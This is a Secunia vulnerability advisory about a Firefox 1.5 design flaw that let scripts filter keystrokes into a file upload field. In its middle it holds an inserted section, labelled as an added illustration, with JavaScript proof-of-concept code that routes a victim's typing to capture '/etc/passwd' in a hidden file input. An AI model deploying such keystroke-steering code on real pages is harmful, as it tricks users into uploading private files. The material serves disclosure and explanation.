----------------------------------------------------------------------

Want to join the Secunia Security Team?

Secunia offers a position as a security specialist, where your daily
work involves reverse engineering of software and exploit code,
auditing of source code, and analysis of vulnerability reports.

http://secunia.com/secunia_security_specialist/

----------------------------------------------------------------------

TITLE:
Firefox File Upload Form Keystroke Event Cancel Vulnerability

SECUNIA ADVISORY ID:
SA20442

VERIFY ADVISORY:
http://secunia.com/advisories/20442/

CRITICAL:
Less critical

IMPACT:
Exposure of sensitive information

WHERE:
From remote

SOFTWARE:
Mozilla Firefox 1.x
http://secunia.com/product/4227/

DESCRIPTION:
Charles McAuley has reported a vulnerability in Firefox, which can be
exploited by malicious people to trick users into disclosing sensitive
information.

The vulnerability is caused due to a design error where a script can
cancel certain keystroke events while the user is entering text. This
can be exploited to trick a user into typing a filename into a file
upload input field by changing focus and cancelling the "OnKeyPress"
JavaScript event for certain characters: keystrokes that match the
next character of the filename are allowed to reach the file input,
and all others are suppressed.

Successful exploitation allows an arbitrary file on the user's system
to be uploaded to a malicious web site, but requires that the user
types text containing the characters of the filename.

The vulnerability has been confirmed in version 1.5.0.4. Other
versions may also be affected.

SOLUTION:
Disable JavaScript support.

Do not enter suspicious text when visiting untrusted web sites.

PROVIDED AND/OR DISCOVERED BY:
Charles McAuley

NOTE: A variant of this vulnerability was reported in a Mozilla
Bugzilla bug entry back in the year 2000.
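The following is an added illustration of the keystroke-filtering trick the description refers to; it is not code from the advisory or from Charles McAuley's original post. It models the attacker-side logic as a pure function (the script lets a keystroke through to the hidden file input only when it is the next character of the filename it wants, and cancels every other keystroke while a decoy text box is updated by script so the victim sees what they typed) and sketches where that logic would hang off a "keypress" handler. The target path, the sample typed text and the element ids are constructed for the example; the exact focus-juggling used against Firefox 1.5.0.4 is not spelled out in the advisory, so the browser wiring is the assumed shape, and current browsers do not accept typed text in a file input at all, so the wiring only documents the mechanism.

```javascript
// Added example (not the advisory's own code): a model of the
// "cancel OnKeyPress on certain characters" trick from SA20442.
// The attacker wants the hidden <input type="file"> to end up holding
// `targetPath`; the victim believes they are typing into a decoy box.

class KeystrokeRouter {
  constructor(targetPath) {
    this.target = targetPath; // attacker-chosen filename (constructed)
    this.captured = "";       // what the file input would contain so far
    this.echoed = "";         // what the victim sees in the decoy box
  }

  get done() {
    return this.captured === this.target;
  }

  // Decide what to do with one typed character.
  // Returns true  -> forward it to the file input (do not cancel).
  // Returns false -> cancel the keypress (the decoy still shows it).
  feed(ch) {
    this.echoed += ch;                 // decoy always mirrors the typing
    if (this.done) return false;       // filename complete: swallow the rest
    if (ch === this.target[this.captured.length]) {
      this.captured += ch;             // wanted: let it land in the file input
      return true;
    }
    return false;                      // unwanted: "return false" on onkeypress
  }
}

// Simulate a victim typing `typed` and report what the file input got.
// Only the characters of `targetPath`, in order, are accepted, so the
// attack needs the victim's text to contain the filename as a subsequence.
function simulate(targetPath, typed) {
  const router = new KeystrokeRouter(targetPath);
  for (const ch of typed) router.feed(ch);
  return {
    captured: router.captured,
    complete: router.done,
    echoed: router.echoed,
  };
}

// Assumed browser wiring (not run under Node). `decoy` is a visible
// <input type="text">, `fileInput` a hidden <input type="file">; both
// are hypothetical elements. Each keypress is either steered into the
// file input by moving focus, or cancelled with preventDefault()
// (the modern form of the handler returning false).
function attach(decoy, fileInput, targetPath) {
  const router = new KeystrokeRouter(targetPath);
  decoy.addEventListener("keypress", (ev) => {
    const ch = ev.key; // 2006-era code would use String.fromCharCode(ev.charCode)
    if (ch.length !== 1) return;
    if (router.feed(ch)) {
      fileInput.focus();   // wanted character: let the keystroke reach the file input
    } else {
      ev.preventDefault(); // unwanted character: cancel the keystroke
    }
    decoy.value = router.echoed; // keep the decoy looking normal either way
    if (router.done) decoy.focus();
  });
  return router;
}

// Stand-alone demonstration on constructed input.
const demo = simulate(
  "/etc/passwd",
  "I'd rate it 7/10 overall, i.e. the cost/benefit of passing the word along is low"
);
console.log(demo.captured, demo.complete); // "/etc/passwd" true
```

The model makes the advisory's precondition concrete: the attack only completes if the victim's typing contains every character of the filename in order, which is why Secunia rates it "Less critical" and why the mitigations are to disable JavaScript or avoid typing on untrusted pages rather than to rely on the file input's own protections.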
ORIGINAL ADVISORY:
Charles McAuley:
http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046610.html

----------------------------------------------------------------------

About:
This Advisory was delivered by Secunia as a free service to help
everybody keep their systems up to date against the latest
vulnerabilities.

Subscribe:
http://secunia.com/secunia_security_advisories/

Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/

Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.

----------------------------------------------------------------------

Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org

----------------------------------------------------------------------